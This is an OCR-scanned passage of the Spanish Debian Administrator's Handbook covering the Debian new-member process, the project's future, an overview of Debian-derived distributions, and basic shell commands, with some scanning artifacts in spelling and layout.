EXTRA  «Encargado  Debian»  («Debian  Maintainer»)  es  otro  estatus  que  proporcionad  me- 
Proceso  liviano  para  nos  Pr>v' legios  que  ’’desarrolador  Debian”.  Un  desarrollador  Debian  solo  necesita 
«encargados  Debian»  realizar  una  revision  enla  subida  inicial,  y  realizar  una  declaracion  indicando  que 
confian  en  el  encargado  potencial  y  su  habilidad  de  mantener  el  paquete  por  su 
cuenta. 


Prerequisites 

Se  espera  que  todos  los  candidates  tengan  un  conocimiento  practico  del  idioma  ingles.  Esto  es 
necesario  en  todos  los  niveles:  por  supuesto,  para  la  comunicacion  inicial  con  el  examinador  pe- 
ro  tambien  luego,  ya  que  el  ingles  es  el  idioma  de  preferencia  para  la  mayoria  de  la  documenta- 
cion;  ademas  los  usuarios  de  paquetes  se  comunicaran  en  ingles  al  reportar  errores  y  esperaran 
respuestas  en  el  mismo  idioma. 

El  otro  prerequisite  tiene  que  ver  con  la  motivacion.  Ser  un  desarrollador  Debian  es  un  proceso 
que  solo  tiene  sentido  si  el  candidate  sabe  que  su  interes  en  Debian  durara  muchos  meses.  El 
proceso  de  aceptacion  en  si  puede  durar  varios  meses,  y  Debian  necesita  desarrolladores  a  largo 
plazo;  se  necesita  mantener  permanentemente  cada  paquete  y  no  solo  subirlos  y  ya. 


Registracion 

El  primer  paso  (real)  consiste  en  encontrar  un  patrocinador  («sponsor»)  o  partidario  («advoca- 
te»);  esto  significa  un  desarrollador  oficial  dispuesto  a  manifestar  que  aceptar  X  seria  algo  bueno 
para  Debian.  Esto  generalmente  implica  que  el  candidate  ha  participado  en  la  comunidad  y  que 
se  aprecio  su  trabajo.  Si  el  candidato  es  timido  y  no  promociono  su  trabajo  publicamente,  pue- 
den  intentar  convencer  a  un  desarrollador  Debian  para  que  lo  patrocine  mostrandole  su  trabajo 
en  privado. 

Al  mismo  tiempo,  el  candidato  debe  generar  un  par  de  claves  publica/privada  con  GnuPG,  que 
deben  ser  firmadas  por  al  menos  dos  desarrolladores  Debian  oficiales.  La  firma  autentica  el  nom- 
bre  en  la  Have.  Efectivamente,  durante  una  fiesta  de  firma  de  claves,  cada  participante  debe  mos- 
trar  identificacion  oficial  (generalmente  un  pasaporte  o  documento  de  identidad)  junto  con  sus 
identificadores  de  claves.  Este  paso  confirma  la  relacion  entre  la  persona  y  las  claves.  Esta  firma, 
por  lo  tanto,  requiere  encontrarse  en  la  vida  real.  Si  no  encuentra  ningun  desarrollador  Debian 
en  una  conferencia  publica  de  software  libre,  puede  buscar  explicitamente  desarrolladores  que 
vivan  cerca  utilizando  la  lista  en  la  siguiente  pagina  web  como  punto  de  partida. 
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https : //wiki .debian . org/Keysigning 

Una  vez  que  el  patrocinador  valido  la  registracion  en  nm.debian.org,  se  le  asigna  al  candidato  un 
Gestorde  explication  («Application  Manager»).  El  gestor  de  aplicacion,  de  alii  en  adelante,  dirigira 
el  proceso  a  traves  de  varios  pasos  y  validaciones  predeterminados. 

La  primera  verificacion  es  una  comprobacion  de  identidad.  Si  ya  tiene  una  clave  firmada  por  dos 
desarrolladores  Debian,  este  paso  es  sencillo;  de  lo  contrario,  el  gestor  de  aplicacion  intentara 
guiarlo  para  buscar  desarrolladores  Debian  cercanos  y  organizar  una  reunion  y  firma  de  claves. 


Aceptacion  de  principios 

Se  siguen  estas  formalidades  administrativas  por  consideraciones  filosoficas.  El  objetivo  es  ase- 
gurarse  que  el  candidato  entiende  y  acepta  el  contrato  social  y  los  principios  detras  del  Software 
Libre.  Unirse  a  Debian  solo  es  posible  si  uno  comparte  los  valores  que  unen  a  los  desarrollado¬ 
res  actuales,  como  estan  expresados  en  los  textos  de  fundacion  (resumidos  en  el  Capitulo  1:  «El 
proyecto  Debian»  pagina  2). 

Ademas,  se  espera  que  cada  candidato  que  desee  unirse  a  las  filas  de  Debian  conozca  como  fun- 
ciona  el  proyecto  y  como  interactuar  de  forma  apropiada  para  solucionar  los  problemas  que 
seguramente  encontraran  con  el  paso  del  tiempo.  Toda  esta  informacion  generalmente  esta  do- 
cumentada  en  los  manuales  para  nuevos  encargados  y  en  la  referencia  para  desarrolladores  de 
Debian.  Deberia  bastar  con  una  lectura  atenta  de  este  documento  para  responder  las  preguntas 
del  examinador.  Si  las  respuestas  no  son  satisfactorias,  se  le  informara  al  candidato.  Tendran 
que  leer  (nuevamente)  la  documentacion  relevante  antes  de  intentarlo  de  nuevo.  En  aquellos 
casos  en  los  que  la  documentacion  existente  no  contenga  la  respuesta  apropiada  para  la  pregun- 
ta,  el  candidato  frecuentemente  podra  llegar  a  la  respuesta  con  un  poco  de  experiencia  practica 
dentro  de  Debian  o,  potencialmente,  discutiendo  con  otros  desarrolladores  Debian.  Este  meca- 
nismo  asegura  que  los  candidatos  se  involucren  de  alguna  forma  en  Debian  antes  de  formar 
completamente  parte  de  el.  Es  una  normativa  deliberada,  por  la  que  los  candidatos  que  se  uniran 
eventualmente  al  proyecto  son  integrados  como  otra  pieza  de  un  rompecabezas  que  se  puede 
extender  sin  fin. 

Este  paso  es  conocido  generalmente  como  filosofia y  procedimientos  (abreviado  como  «P&P»  por 
«Philosophy  &  Procedures)))  en  la  jerga  de  los  desarrolladores  involucrados  en  el  proceso  de 
nuevos  miembros. 


Revision  de  habilidades 

Se  debe  justificar  cada  aplicacion  para  convertirse  en  un  desarrollador  oficial  de  Debian.  Conver- 
tirse  en  un  miembro  del  proyecto  requiere  mostrar  que  esta  posicion  es  legitimay  que  facilita  el 
trabajo  del  candidato  para  ayudar  a  Debian.  La  justificacion  mas  comun  es  que  ser  desarrollador 
Debian  facilita  el  mantener  un  paquete  Debian,  pero  no  es  la  unica.  Algunos  desarrolladores  se 
unen  al  proyecto  para  adaptar  una  arquitectura  particular,  otros  desean  mejorar  la  documenta¬ 
cion,  etc. 
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Este  paso  le  ofrece  al  candidato  la  oportunidad  de  especificar  lo  que  desean  hacer  dentro  del 
proyecto  Debian  y  mostrar  lo  que  ya  han  hecho  para  ello.  Debian  es  un  proyecto  pragmatico  y 
decir  algo  no  es  suficiente  si  las  acciones  no  coinciden  con  lo  que  se  anuncia.  Frecuentemente, 
cuando  el  rol  deseado  dentro  del  proyecto  esta  relacionado  con  la  manutencion  de  un  paquete, 
se  debera  validar  tecnicamente  una  primera  version  del  futuro  paquete  y  debera  ser  subido  a 
los  servidores  Debian  por  un  desarrollador  Debian  existente  como  patrocinador. 


COMUNIDAD  Los  desarrolladores  Debian  pueden  «patrocinar»  («sponsor»)  paquetes  preparados 
Patrocinio  Por  algu'en  rnas,  lo  que  significa  que  los  publican  en  los  repositories  Debian  ofi- 
ciales  luego  de  haber  realizado  una  revision  cuidadosa.  Este  mecanismo  le  permite 
a  terceros,  quienes  todavfa  no  atravesaron  el  proceso  de  nuevos  miembros,  contri- 
buir  al  proyecto  ocasionalmente.  Al  mismo  tiempo,  asegura  que  todos  los  paquetes 
incluidos  en  Debian  siempre  son  revisados  por  un  miembro  oficial. 


Finalmente,  el  examinador  revisa  las  habilidades  tecnicas  (empaquetado)  del  candidato  con  un 
cuestionario  detallado.  No  se  permiten  respuestas  incorrectas,  pero  no  hay  limite  de  tiempo  para 
responder.  Toda  la  documentacion  esta  disponible  y  se  permiten  varios  intentos  si  las  primeras 
respuestas  no  son  satisfactorias.  Este  paso  no  intenta  discriminar,  sino  garantizar  al  menos  un 
rm'nimo  comun  de  conocimiento  para  todos  los  nuevos  contribuyentes. 

En  lajerga  de  los  examinadores,  se  conoce  a  este  paso  como  tareasy  habilidades  (abreviado  «T&S» 
por  «Tasks  &  Skills»). 


Aprobacion  final 

En  el  ultimo  paso,  un  DAM  ( gestor  de  cuentas  Debian:  «Debian  Account  Manager»)  revisa  todo  el 
proceso.  El  DAM  revisara  toda  la  informacion  que  recolecto  el  examinador  sobre  el  candidato  y 
tomara  la  decision  de  crearle  una  cuenta  en  los  servidores  Debian  o  no.  En  los  casos  que  necesite 
informacion  adicional  se  puede  demorar  la  creacion  de  la  cuenta.  Los  rechazos  son  bastante 
raros  si  el  examinador  realiza  un  buen  trabajo  siguiendo  el  procedimiento,  pero  a  veces  ocurren. 
Nunca  son  permanentes  y  el  candidato  es  libre  de  intentar  nuevamente  luego  de  un  tiempo. 

La  decision  del  DAM  es  final  y  (casi)  sin  apelacion,  lo  que  explica  porque,  en  el  pasado,  se  criticaba 
frecuentemente  a  aquellos  en  dicho  rol . 
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La  historia  de  Falcot  Corp  termina  con  este  ultimo  capftulo,  pero  Debian  continuay  el  futuro 
seguramente  traera  muchas  sorpresas  interesantes. 


16.1  Los  proximos  desarrollos 


Semanas  (o  meses)  antes  que  se  publique  una  nueva  version  de  Debian  el  Gestor  de  versiones  se- 
lecciona  el  nombre  codigo  de  la  proxima  version.  Ahora  que  salio  la  version  8  de  Debian  los  desa- 
rrolladores  ya  estan  ocupados  trabajando  en  la  proxima  version,  con  nombre  codigo  Stretch- 

No  hay  ninguna  lista  oficial  de  cambios  planeados  y  Debian  nunca  hace  promesas  relacionadas 
con  los  objetivos  tecnicos  de  las  proximas  versiones.  Sin  embargo,  ya  se  pueden  notar  algunas 
tendencias  en  el  desarrollo  podemos  realizar  apuestas  sobre  lo  que  podria  suceder  (o  no). 

Para  mejorar  la  seguridad  y  la  confianza,  la  mayor  parte  sino  todos  los  paquetes  se  realizaran 
para  reproducir  su  creacion;  dicho  de  otra  forma,  sera  posible  reconstruir  byte  a  byte  paquetes 
binarios  identicos  a  partir  de  los  paquetes  fuente,  lo  que  permitira  a  cualquiera  verificar  que  no 
ha  habido  ninguna  modificacion  durante  su  construccion. 

Como  aspecto  relacionado,  se  ha  dedicado  mucho  esfuerzo  a  mejorar  la  seguridad  por  defecto,  y 
mitigar  tanto  los  ataques  ’’tradicionales”  como  nuevas  brechas  que  impliquen  vigilancia  masiva. 

Por  supuesto,  todas  las  principales  colecciones  de  software  seguiran  teniendo  un  cambio  de  ver¬ 
siones  importante.  La  ultima  version  de  distintos  escritorios  nos  llevara  mejoras  en  la  usabilidad 
y  nuevas  caracteristicas.  Wayland,  el  nuevo  servidor  grafico  que  se  esta  desarrollando  para  rem- 
plazar  Xll  como  una  alternativa  mas  moderna,  estara  disponible  (aunque  seguramente  no  por 
defecto)  en  algunos  de  estos  entornos  de  escritorio. 

«Bikesheds»,  una  nueva  caracteristica  del  archivo  de  mantenimiento  de  software,  permitira  a 
los  desarrolladores  alojar  repositories  de  paquetes  para  fines  especiales  ademas  de  los  reposi¬ 
tories  principales;  esto  permitira  tener  repositories  de  paquetes  personales,  repositories  para 
software  que  no  este  listo  para  alcanzar  el  repositorio  principal,  repositorio  para  software  que 
tiene  un  publico  muy  concreto,  repositories  temporales  para  prueba  y  nuevas  ideas,  y  este  tipo 
de  cosas. 


16.2.  El  futuro  de  Debian 

Ademas  de  estos  desarrollos  internos  uno  puede,  siendo  razonable,  esperar  que  vean  la  luz  nue¬ 
vas  distribuciones  basadas  en  Debian  ya  que  muchas  herramientas  continuan  faciltando  esta 
tarea.  Tambien  comenzaran  nuevos  subproyectos  especializados  para  aumentar  el  alcance  de 
Debian  en  nuevos  horizontes. 

La  comunidad  de  usuarios  de  Debian  aumentara  y  nuevos  colaboradores  se  uniran  al  proyecto... 
incluso,  tal  vez,  justed! 

El  proyecto  Debian  es  mas  fuerte  que  nunca  y  bien  encaminado  en  su  objetivo  de  ser  una  dis- 
tribucion  universal;  el  chiste  interno  en  la  comunidad  Debian  es  «dominacion  mundial»  ( World 
Domination ). 

A  pesar  de  su  edad  y  tamano,  Debian  continua  creciendo  en  todas  direcciones  (a  veces  inespera- 
das).  Los  colaboradores  hierven  con  ideas  y  el  impuslo  aumenta  con  las  discusiones  en  las  listas 
de  correo  de  desarrollo,  aun  cuando  parezean  peleas  de  gallos.  A  veces  se  compara  a  Debian  con 
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un  agujero  negro,  de  tal  densidad  que  atrae  a  cualquier  nuevo  proyecto  de  software. 

Ademas  de  la  aparente  satisfaction  de  la  mayorfa  de  los  usuarios  de  Debian,  parece  volverse 
mas  y  mas  indisputable  una  nueva  tendencia:  la  gente  se  da  cuenta  cada  vez  mas  que  colabo- 
rar,  en  lugar  de  trabajar  por  su  cuenta  en  su  rincon,  lleva  a  mejores  resultados  para  todos.  Tal 
es  el  razonamiento  utilizado  por  las  distribuciones  que  vuelven  a  incorporarse  a  Debian  como 
subproyectos. 

El  proyecto  Debian,  por  lo  tanto,  no  tiene  miedo  a  la  extincion... 


16.3.  El  futuro  de  este  Iibro 

Querrfas  que  este  libro  evolucione  en  el  espiritu  del  software  libre.  Por  lo  tanto,  damos  la  bienve- 
nida  a  contribuciones,  comentarios,  sugerencias  y  criticas.  Dirijalas  a  Raphael  (hertzog@debian. 
org)  o  Roland  (lolando@debian.org).  Si  tiene  sugerencias  o  comentarios  que  necesiten  algun  ti- 
po  de  accion,  puede  reportar  un  error  en  el  paquete  Debian  debian-handbook.  Usaremos  el  sitio 
web  para  juntar  toda  la  informacion  relevante  a  su  evolucion  y  alll  encontrara  informacion  so- 
bre  como  colaborar,  especialmente  si  desea  traducir  este  libro  para  que  este  disponible  inclusive 
para  mas  gente  que  aquella  a  la  que  puede  llegar  hoy. 

http://debian-handbook.info/ 

Intentamos  integrar  la  mayorfa  de  lo  que  nos  enseho  nuestra  experiencia  en  Debian  para  que 
cualquiera  pueda  utilizar  esta  distribucion  y  aprovecharla  al  maximo  lo  mas  rapido  posible.  Es¬ 
perantos  que  este  libro  contribuya  a  hacer  Debian  menos  confuso  y  mas  popular,  jdamos  la  bien- 
venida  a  que  lo  publiciten! 

Nos  gustarfa  finalizar  en  un  tono  mas  personal.  Escribir  (y  traducir)  este  libro  tomo  un  tiempo 
considerable  de  nuestra  actividad  profesional  usual.  Ya  que  ambos  somos  consultores  indepen- 
dientes,  cualquier  nueva  fuente  de  ingresos  nos  da  la  libertad  de  dedicar  mas  tiempo  a  mejorar 
Debian;  esperamos  que  este  libro  sea  exitoso  y  contribuya  con  ello.  Mientras  tanto  jpuede  con- 
tratarnos! 

•-  http : //www . f  reexian . com 
http://www.gnu randal . com 
jEIasta  pronto! 


Conclusion:  el  futuro  de  Debian 
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A.I.  Censo  y  cooperacion 

El  Proyecto  Debian  reconoce  plenamente  la  importancia  de  distribuciones  derivadas  y  respal- 
da  activamente  la  colaboracion  entre  todas  las  partes  involucradas.  Usualmente  esto  involucra 
integrar  mejoras  desarrolladas  inicialmente  por  una  distribucion  derivada  de  tal  manera  que 
cualquiera  pueda  beneficiarse  y  se  reduzca  el  trabajo  de  mantenimiento  a  largo  plazo. 

Esto  explica  porque  se  invita  a  las  distribuciones  derivadas  a  involucrarse  en  las  discusiones  en 
la  lista  de  correo  debian-derivatives@lists.debian.org  y  participar  en  el  censo  de  derivados.  Este 
censo  tiene  el  objetivo  de  recolectar  informacion  sobre  el  trabajo  que  ocurre  en  un  derivado  para 
que  los  desarrolladores  Debian  oficiales  puedan  seguir  mas  facilmente  el  estado  de  sus  paquetes 
en  las  variantes  de  Debian. 

https : //wiki .debian . org/De rivatives Front Desk 
http : //wiki . debian . org/De rivatives/Cens us 
Ahora  describiremos  brevemente  las  distribuciones  derivadas  mas  interesantes  y  populares. 


A. 2.  Ubuntu 

Ubuntu  causo  gran  revuelo  cuando  llego  al  escenario  del  Software  Libre,  y  por  buenas  razones: 
Canonical  Ltd.,  la  empresa  que  creo  esta  distribucion,  comenzo  contratando  poco  mas  de  treinta 
desarrolladores  Debian  y  publicando  su  objetivo  a  muy  largo  plazo  de  proveer  una  distribucion 


para  el  publico  en  general  con  una  nueva  version  dos  veces  al  ano.  Tambien  se  comprometieron 
a  mantener  cada  version  por  un  ano  y  medio. 

Estos  objetivos  necesariamente  conllevaron  una  reduction  en  su  alcance;  Ubuntu  se  concentra 
en  una  menor  cantidad  de  paquetes  que  Debian  y  esta  basada  principalmente  en  el  escritorio 
GNOME  (aunque  una  distribution  oficial  derivada  de  Ubuntu,  llamada  «Kubuntu»,  esta  basada 
en  KDE).  Todo  es  internacionalizado  y  esta  disponible  en  muchos  idiomas. 

Hasta  ahora,  Ubuntu  logro  mantener  este  ritmo  de  publication.  Tambien  publican  versiones  de 
soporte  a  largo  plazo  (LTS:  «Long  Term  Support))),  con  una  promesa  de  manutencion  de  5  anos. 
En  Abril  de  2015,  la  version  LTS  actual  es  la  14.04,  apodada  «Utopic  Unicorn».  La  ultima  ver¬ 
sion  no  LTS  es  la  15.04,  apodada  «Vivid  Vervet».  Los  numeros  de  version  describen  la  fecha  de 
publication:  15.04,  por  ejemplo,  fue  publicada  en  Abril  de  2015. 


EN  LA  PRACTICA 

el  soporte  que  ofrece 
Ubuntu  y  la  promesa  de 
mantenimiento 


Canonical  ha  ajustado  varias  veces  las  reglas  que  controlan  la  longitud  del  perio- 
do  durante  el  que  se  mantiene  una  publicacion  dada.  Canonical,  como  empresa, 
promete  proveer  actualizaciones  de  seguridad  para  todo  el  software  disponible  en 
las  secciones  main  y  restricted  del  compendio  de  Ubuntu  durante  5  anos  para 
publicaciones  LTS  y  por  9  meses  para  publicaciones  que  no  lo  sean.  Los  miembros 
del  equipo  MOTU  ( duenos  del  universo :  «Masters  Of  The  Universe*)  mantienen 
todos  los  demas  paquetes  (disponibles  en  universe  y  multiverse)  segun  el  mejor 
esfuerzo  posible.  Preparese  para  gestionar  el  soporte  de  seguridad  por  su  cuenta  si 
depende  de  paquetes  en  estas  ultimas  secciones. 


Ubuntu  llego  a  una  amplia  audiencia  en  el  publico  general.  Millones  de  usuarios  se  impresiona- 
ron  por  su  facilidad  de  instalacion  y  el  trabajo  que  se  realizo  en  hacer  que  el  escritorio  sea  mas 
sencillo  de  utilizar. 

Solia  haber  una  relation  tensa  entre  Ubuntu  y  Debian;  Los  desarrolladores  de  Debian,  que  pu- 
sieron  grandes  esperanzas  en  que  Ubuntu  colaborase  directamente  con  Debian,  quedaron  de- 
fraudados  por  la  diferencia  del  marketing  de  Canonical,  el  cual  daba  a  entender  que  en  Ubuntu 
se  encontraban  los  buenos  ciudadanos  del  mundo  del  Software  Libre,  y  la  realidad  era  que  sim- 
plemente  publicaban  los  cambios  que  hacian  sobre  los  paquetes  de  Debian.  Las  cosas  han  ido 
a  mejor  a  lo  largo  de  los  anos,  y  Ubuntu  ha  generalizado  la  practica  de  redirigir  los  parches  al 
sitio  mas  apropiado  (aunque  esto  solo  se  aplique  al  software  externo  que  empaquetan  y  no  al 
especifico  de  Ubuntu,  tales  como  Mir  o  Unity). 

http : //www. ubuntu . com/ 


A. 3.  Linux  Mint 

Linux  Mint  es  una  distribution  (parcialmente)  mantenida  por  la  comunidad,  respaldada  con 
donaciones  y  publicidad.  Su  producto  estrella  esta  basado  en  Ubuntu,  pero  tambien  proveen  una 
variante  «Linux  Mint  Debian  Edition))  que  evoluciona  continuamente  (y  esta  basada  en  Debian 
Testing).  En  ambos  casos,  la  instalacion  inicial  involucra  arrancar  con  un  LiveDVD. 
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La  distribucion  intenta  simplificar  el  acceso  a  tecnologfas  avanzadas  y  provee  interfaces  graficas 
especi'ficas  sobre  el  software  usual.  Por  ejemplo,  Linux  Mint  esta  basado  en  Cinnamon  en  vez 
de  GNOME  por  defecto  (pero  tambien  incluye  MATE  asi  como  tambien  KDE  y  Xfce)  provee  un 
sistema  de  menus  diferente;  de  forma  similar,  la  interfaz  de  gestion  de  paquetes,  aunque  basada 
en  APT,  provee  una  interfaz  especffica  con  una  evaluacion  del  riesgo  en  cada  actualizacion  de 
un  paquete. 

Linux  Mint  incluye  una  gran  cantidad  de  software  privativo  para  mejorar  la  experiencia  de  los 
usuarios  que  lo  puedan  necesitar.  Por  ejemplo:  Adobe  Flash  y  «codecs»  multimedia. 

http ://www. Linuxmint . com/ 


A. 4.  Knoppix 

La  distribucion  Knoppix  casi  no  necesita  introduccion.  Fue  la  primera  distribucion  popular  que 
proveyo  un  LiveCD;  en  otras  palabras,  un  CD-ROM  de  arranque  que  ejecutaba  un  sistema  Linux 
listo  sin  necesitar  un  disco  duro  —  se  mantendria  intacto  cualquier  sistema  ya  instalado  en  la 
maquina.  La  deteccion  automatica  de  los  dispositivos  disponibles  le  permitio  a  esta  distribucion 
funcionar  en  la  mayorfa  de  las  configuraciones  de  hardware.  El  CD-ROM  incluye  casi  2  Gb  de 
software  (comprimido)  y  la  version  en  DVD-ROM  todavia  contiene  mas. 

La  combinacion  de  este  CD-ROM  y  una  Have  U SB  le  permite  llevar  sus  archivos  a  todos  lados  y  tra- 
bajar  en  cualquier  equipo  sin  dejar  rastros  —  recuerde  que  la  distribucion  no  utiliza  el  disco  duro 
en  absoluto.  Knoppix  utiliza  LXDE  (un  escritorio  grafico  liviano)  por  defecto,  pero  la  version  en 
DVD  incluye  tambien  GNOME  y  KDE.  Muchas  otras  distribuciones  proveen  otras  combinaciones 
de  escritorios  y  software.  Esto  es  posible,  en  parte,  gracias  al  paquete  Debian  live-build  que  hace 
relativamente  sencillo  crear  un  LiveCD. 

http : //live . debian . net/ 

Sepa  que  Knoppix  tambien  provee  un  instalador:  puede  primero  probar  la  distribucion  como 
LiveCD  y  luego  instalarla  en  un  disco  duro  para  obtener  mejor  rendimiento. 

http : //www. knopper . net/knoppix/index- en . html 


A. 5.  Aptosid  y  Siduction 

Esta  distribucion  basada  en  la  comunidad  sigue  los  cambios  de  Debian  Sid  ( Unstable )  —  de  alii  su 
nombre  —  e  intenta  publicar  4  versiones  nuevas  cada  ano.  Las  modificaciones  tienen  alcances 
limitados:  el  objetivo  es  proveer  el  software  mas  reciente  y  actualizar  los  controladores  para 
el  hardware  mas  reciente  al  mismo  tiempo  que  permite  a  sus  usuarios  volver  a  la  distribucion 
oficial  de  Debian  en  cualquier  momento.  Aptosid  era  conocido  anteriormente  como  Sidux,  y 
Siduction  es  una  bifurcacion  mas  reciente  de  Aptosid. 

+  http : //aptosid . com 

http://siduction.org 


Distribuciones  derivadas 


469 


A. 6.  GrmI 


Grml  es  un  LiveCD  con  muchas  herramientoas  para  administradores  de  sistemas  que  tienen  que 
ver  con  la  instalacion,  desplieguey  rescate  de  sistemas.  Se  provee  el  LiveCD  en  dos  versiones,  full 
(«completo»)  y  small  («pequeno»),  ambas  disponibles  para  equipos  de  32  y  64  bits.  Obviamente, 
la  diferencia  entre  estas  versiones  es  la  cantidad  de  software  inclufdo  y  el  tamano  del  resultado. 

+  https://grml.org 


A. 7.  Tails 

Tails  (The  Amnesic  Incognito  Live  System,  el  Sistema  vivo  incognito  y  amnesico)  pretende  ofre- 
cer  un  sistema  vivo  que  guarde  el  anonimato  y  la  privacidad.  Se  cuida  de  no  dejar  ningun  rastro 
en  el  ordenador  donde  se  ejecuta  y  usa  la  red  Tor  para  conectarse  a  internet  de  la  forma  lo  mas 
anonima  posible. 

https : //tails . bourn . org 


A. 8.  Kali  Linux 

Kali  Linux  es  una  distribution  derivada  de  Debian  especializada  en  pruebas  de  penetration 
(«pentesting»  para  acortar).  Provee  software  para  auditar  la  seguridad  de  una  red  o  el  equi- 
po  en  el  que  se  ejecuta,  y  analiza  los  resultados  despues  del  ataque  (lo  que  es  conocido  como 
«informatica  forense»). 

+  https://kali.org 


A. 9.  Devuan 

Devuan  es  una  bifurcation  relativamente  nueva  de  Debian:  empezo  en  2014  como  la  reaction 
a  la  decision  tomada  por  Debian  de  cambiar  a  systemd  como  sistema  de  inicio  por  defecto.  Un 
grupo  de  usuarios  vinculados  por  sysv  y  contrarios  (con  opiniones  reales  o  percebidas)  a  los 
inconvenientes  que  proporciona  systemd  empezaron  Devuan  con  el  objetivo  de  mantener  un 
sistema  libre  de  systemd.  A  fecha  de  Marzo  de  2015  todavia  no  han  publicado  ninguna  version 
real;  parece  esperar  a  ver  si  el  proyecto  convence  y  encuentro  su  nicho  o  si  los  detractores  de 
systemd  aprenderan  a  aceptarlo. 

http : //devuan .org 


A. 10.  Tanglu 

Tanglu  es  otra  derivada  de  Debian;  esta  se  basa  en  una  mezcla  de  Debian  Testing  y  Unstable.  Su 
meta  es  ofrecer  un  entorno  de  escritorio  amigable  y  moderno  basado  en  software  reciente,  sin 
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los  acarreos  de  liberation  de  Debian. 


http://tanglu.org 


A.  11.  DoudouLinux 

DoudouLinux  tiene  como  objetivo  a  los  ninos  pequenos  (desde  los  2  anos  de  edad).  Para  con- 
seguir  este  objetivo,  provee  una  interfaz  grafica  muy  modificada  (basada  en  LXDE)  y  con  tiene 
muchos  juegos  y  aplicaciones  educativas.  El  acceso  a  Internet  esta  filtrado  para  evitar  que  los 
ninos  accedan  a  sitios  web  problematicos.  Y  la  publicidad  se  encuentra  bloqueada.  El  objetivo  es 
que  los  padres  puedan  dejar  tranquilamente  que  sus  hijos  utilicen  el  equipo  una  vez  que  inicio 
DoudouLinux.  Y  los  ninos  deberian  estar  encantados  con  DoudouLinux  de  la  misma  forma  que 
disfrutan  consolas  de  videojuegos. 

http://www.doudoulinux.org 


A. 12.  Raspbian 

Raspbian  es  una  reconstruction  de  Debian  optimizada  para  la  popular  (y  economica)  familia 
Raspberry  Pi  de  ordenadores  en  placa.  El  hardware  para  esta  plataforma  es  mas  potente  que 
la  arquitectura  Debian  armel  puede  ofrecer  y  que  se  requeriria  para  armhf ;  asi  que  Raspbian  es 
una  clase  de  intermediario,  reconstruido  especificamente  para  este  hardware  e  incluye  parches 
enfocados  a  solo  a  este  ordenador. 

https://raspbian.org 


A. 13.  Y  muchas  mas 

El  sitio  web  Distrowatch  hace  referencia  a  una  inmensa  cantidad  de  distribuciones  Linux,  mu¬ 
chas  de  las  cuales  estan  basadas  en  Debian.  Navegar  este  sitio  es  una  excelente  forma  de  aden- 
trarse  en  la  diversidad  del  mundo  del  Software  Libre. 

http ://dist rowatch . com 

El  formulario  de  busqueda  le  puede  ayudar  a  rastrear  una  distribution  segun  su  linaje.  En  Marzo 
de  2015,  jseleccionar  Debian  llevaba  a  131  distribuciones  activas! 

http ://dist rowatch . com/search . php 
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B.l.  Consola  y  ordenes  basicas 

En  el  mundo  Unix,  todo  administrador  debe  utilizar  la  linea  de  ordenes  tarde  o  temprano;  por 
ejemplo,  cuando  el  sistema  no  inicia  adecuadamente  y  solo  provee  la  consola  de  modo  de  rescate. 
Poder  manejar  tal  interfaz  es,  por  lo  tanto,  una  habilidad  de  supervivencia  basica  para  dichas 
circunstancias. 


VISTA  RAPIDA  Puede  ejecutar  un  entorno  de  linea  de  ordenes  desde  el  escritorio  graficos,  con  una 
Inicio  del  interprete  de  aplicacion  conocida  como  «terminal»,  como  las  que  encontrara  en  la  vista  «Acti- 
ordenes  vidades»  de  Gnome  (es  la  que  vera  cuando  mueva  el  raton  a  la  esquina  superior 
izaquierda  tecleando  las  primeras  letras  del  nombre  de  la  aplicacion).  En  KDE  lo 
encontrara  en  K  — >  Aplicaciones  — )  Sistema. 


Esta  seccion  solo  provee  una  mirada  rapida  de  las  ordenes.  Todas  tienen  muchas  opciones  que 
no  describimos,  asi  que  le  remitimos  a  la  abundante  documentacion  de  las  que  dispone  en  sus 
respectivas  paginas  de  manual. 


B.1.1.  Navegacion  del  arbol  de  directories  y  gestion  de  archivos 

Una  vez  que  abrio  una  sesion,  el  programa  pwd  (que  significa  imprimir  directorio  de  trabajo:  «print 
working  directory)))  mostrara  la  ubicacion  actual  en  el  sistema  de  archivos.  Puede  cambiar  el  di¬ 
rectorio  actual  ejecutando  cd  directorio  (cd  significa  cambiar  directorio:  «change  directory))). 


El  directorio  padre  siempre  se  llama  ..  (dos  puntos),  mientras  que  tambien  se  conoce  al  direc- 
torio  actual  como  .  (un  punto).  El  programa  Is  permite  enumerar  («listing»)  el  contenido  de  un 
directorio.  Si  no  le  provee  ningun  parametro,  operara  en  el  directorio  actual. 

$  pwd 

/home/rhertzog 

$  cd  Desktop 
$  pwd 

/home/rhertzog/Desktop 

$  cd  . 

$  pwd 

/home/rhertzog/Desktop 

$  cd  . . 

$  pwd 

/home/rhertzog 
$  Is 

Desktop  Downloads  Pictures  Templates 
Documents  Music  Public  Videos 

Puede  crear  un  directorio  nuevo  con  mkdir  directorio  y  puede  eliminar  un  directorio  exis- 
tente  (y  vacio)  con  rmdir  directorio.  El  programa  mv  permite  mover  («move»)  y/o  cambiar  el 
nombre  de  archivos  y  directories;  eliminara  («remove»)  un  archivo  con  rm  archivo. 

$  mkdir  test 
$  Is 


Desktop 

Documents 

$  mv  test 
$  Is 

Downloads 

Music 

new 

Pictu  res 

Public 

Templates 

test 

Videos 

Desktop  Downloads 

Documents  Music 

$  rmdir  new 
$  Is 

new 

Pictu  res 

Public 

Templates 

Videos 

Desktop 

Documents 

Downloads 

Music 

Pictu  res 

Public 

Templates 

Videos 

B.1.2  Visualizacion  y  modificacion  de  archivos  de  texto 

Si  ejecuta  cat  archivo  ( concatena  —  «concatenate»  —  archivos  a  su  salida  estandar  del  disposi- 
tivo)  este  leera  el  archivo  y  mostrara  sus  contenidos  en  la  terminal.  Si  el  archivo  es  demasiado 
grande  para  entrar  en  una  pantalla,  utilice  un  paginador  como  less  (o  more)  para  mostrarlo 
pagina  por  pagina. 

El  programa  editor  inicia  un  editor  de  texto  (como  vi  o  nano)  y  permite  crear,  modificar  y  leer 
archivos  de  texto.  A  veces  puede  crear  los  archivos  mas  simples  directamente  desde  el  interprete 
utilizando  redireccion:  echo  "texto"  >archivo  creara  un  archivo  llamado  archivo  con  «texto» 
como  su  contenido.  Tambien  es  posible  agregar  una  linea  al  final  de  este  archivo  si  ejecuta  algo 
como  echo  "moretext"  »  archivo.  Note  el  »  en  este  ejemplo. 
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B.1.3.  Busqueda  de  y  en  archivos 

Si  ejecuta  find  directorio  criterio,  buscara  archivos  en  lajerarquia  dentro  de  directorio  se- 
gun  varios  criterios.  El  criterio  utilizado  mas  frecuentemente  es  -name  nombre:  permite  buscar 
un  archivo  segun  su  nombre. 

